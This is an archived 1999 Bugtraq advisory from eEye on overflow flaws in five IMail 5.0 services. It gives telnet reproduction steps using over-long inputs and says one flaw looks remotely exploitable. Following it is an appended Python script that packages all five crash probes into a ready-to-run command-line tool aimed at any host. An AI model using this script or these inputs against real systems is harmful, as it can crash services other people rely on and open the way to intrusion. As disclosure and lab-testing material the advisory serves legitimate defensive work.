From marc@EEYE.COM Wed Mar 3 03:00:41 1999
From: Marc
To: BUGTRAQ@netspace.org
Date: Mon, 1 Mar 1999 23:30:21 -0800
Subject: Multiple IMail Vulnerabilities

________________________________________________________________________

eEye Digital Security Team
www.eEye.com
info@eEye.com

March 1, 1999
________________________________________________________________________

Multiple IMail Vulnerabilities

Systems Affected    IMail 5.0
Release Date        March 1, 1999
Advisory Code       AD03011999
________________________________________________________________________
Description:
________________________________________________________________________

The following holes can be used as a Denial of Service against the
services listed below and, in some cases, to execute code remotely.

---> Imapd (143)

The imapd login process does not do proper bounds checking on usernames
and passwords.

* OK IMAP4 Server (IMail 4.06)
X LOGIN glob1 glob2

Where glob1 is 1200 characters and glob2 is 1300 characters. The imapd
service will crash with the usual overflow error.

---> LDAP (389)

Telnet to server.com 389
Send:            Y glob1   (hit enter twice)
Server Returns:  0
Send:            Y glob2   (hit enter)

Where glob1 and glob2 are 2375 characters and Y is the literal
character Y. The LDAP service climbs to roughly 90 percent utilization
and sits there, consuming most of the system's resources.

---> IMonitor (8181)

Telnet to server.com 8181
Send:            glob1     (hit enter twice)

Where glob1 is 2045 characters. The IMonitor service crashes with the
normal overflow message.

---> IMail Web Service (8383)

Telnet to server.com 8383
Send:            GET /glob1/

Where glob1 is 3000 characters. The usual overflow message will be
displayed. This one looks to be easily exploitable. >:-]

---> Whois32 Daemon (43)

Telnet to server.com 43
Send:            glob1

Where glob1 is 1000 characters. The usual overflow message will be
displayed. Ya... starting to sound old.

________________________________________________________________________
Vendor Status
________________________________________________________________________

Vendor has been notified; waiting for response...

________________________________________________________________________
Copyright (c) 1999 eEye Digital Security Team
________________________________________________________________________

Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please e-mail
alert@eEye.com for permission.

________________________________________________________________________
Disclaimer:
________________________________________________________________________

The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of or
in connection with the use or spread of this information. Any use of
this information is at the user's own risk.

Please send suggestions, updates, and comments to:

eEye Digital Security Team
info@eEye.com
http://www.eEye.com
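The five probes in the Description section are all the same procedure (open a TCP connection, send an over-long line or argument, see whether the service survives), so the following script reproduces them in one place. This is an added example for lab replay against a host you own, not eEye's code and not the commands they typed. Only the ports and the glob lengths come from the advisory; the filler byte "A", CRLF line endings for each "hit enter", the exact framing of the LDAP and web lines, and the function names are assumptions made here.

```python
"""
Probe generator for the five IMail services named in the advisory above.
Added example, not eEye's own code. Assumptions: the filler byte "A"
(the advisory does not say which character was used), CRLF line endings
for the "hit enter" steps, and the exact framing of each line.
"""
import argparse
import socket

# Lengths and ports are taken from the advisory; everything else is assumed.
IMAP_USER_LEN = 1200
IMAP_PASS_LEN = 1300
LDAP_LEN = 2375
IMONITOR_LEN = 2045
WEB_LEN = 3000
WHOIS_LEN = 1000

CRLF = b"\r\n"


def glob(length, fill=b"A"):
    """Return a filler string of the given length (the advisory's 'glob')."""
    return fill * length


def imap_login_probe(user_len=IMAP_USER_LEN, pass_len=IMAP_PASS_LEN):
    """'X LOGIN glob1 glob2': oversized username and password arguments."""
    return [b"X LOGIN " + glob(user_len) + b" " + glob(pass_len) + CRLF]


def ldap_probe(length=LDAP_LEN):
    """Two sends: 'Y glob1' plus enter twice, then 'Y glob2' plus enter."""
    return [b"Y " + glob(length) + CRLF + CRLF, b"Y " + glob(length) + CRLF]


def imonitor_probe(length=IMONITOR_LEN):
    """A bare oversized line followed by enter twice."""
    return [glob(length) + CRLF + CRLF]


def web_probe(length=WEB_LEN):
    """'GET /glob1/' against the IMail web service on 8383."""
    return [b"GET /" + glob(length) + b"/" + CRLF + CRLF]


def whois_probe(length=WHOIS_LEN):
    """A bare oversized line to the whois32 daemon."""
    return [glob(length) + CRLF]


# service name -> (port from the advisory, probe builder)
PROBES = {
    "imapd": (143, imap_login_probe),
    "ldap": (389, ldap_probe),
    "imonitor": (8181, imonitor_probe),
    "web": (8383, web_probe),
    "whois": (43, whois_probe),
}


def send_probe(host, port, messages, timeout=5.0):
    """Connect, send each message in turn, and collect whatever comes back.

    Network I/O only; run it against a host you own. The reply after the
    first LDAP send is where the advisory says the server answers '0'.
    """
    replies = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        for msg in messages:
            sock.sendall(msg)
            try:
                replies.append(sock.recv(4096))
            except socket.timeout:
                replies.append(b"")
    return b"".join(replies)


def service_alive(host, port, timeout=3.0):
    """Crash check: can we still open a TCP connection after the probe?"""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def main():
    parser = argparse.ArgumentParser(description="Replay an IMail probe from the advisory.")
    parser.add_argument("host")
    parser.add_argument("service", choices=sorted(PROBES))
    args = parser.parse_args()
    port, builder = PROBES[args.service]
    print(f"sending {args.service} probe to {args.host}:{port}")
    reply = send_probe(args.host, port, builder())
    print(f"server replied with {len(reply)} bytes; alive afterwards: {service_alive(args.host, port)}")


if __name__ == "__main__":
    main()
```

Run it as `python probe.py <host> web` (or `imapd`, `ldap`, `imonitor`, `whois`). The builders are kept separate from the sender so the payloads can be inspected or fed to another tool without touching the network; `service_alive` is the crude crash check the advisory implies ("the service will crash"), and a service that accepts a connection after the probe is evidence the build in front of you is not the one described.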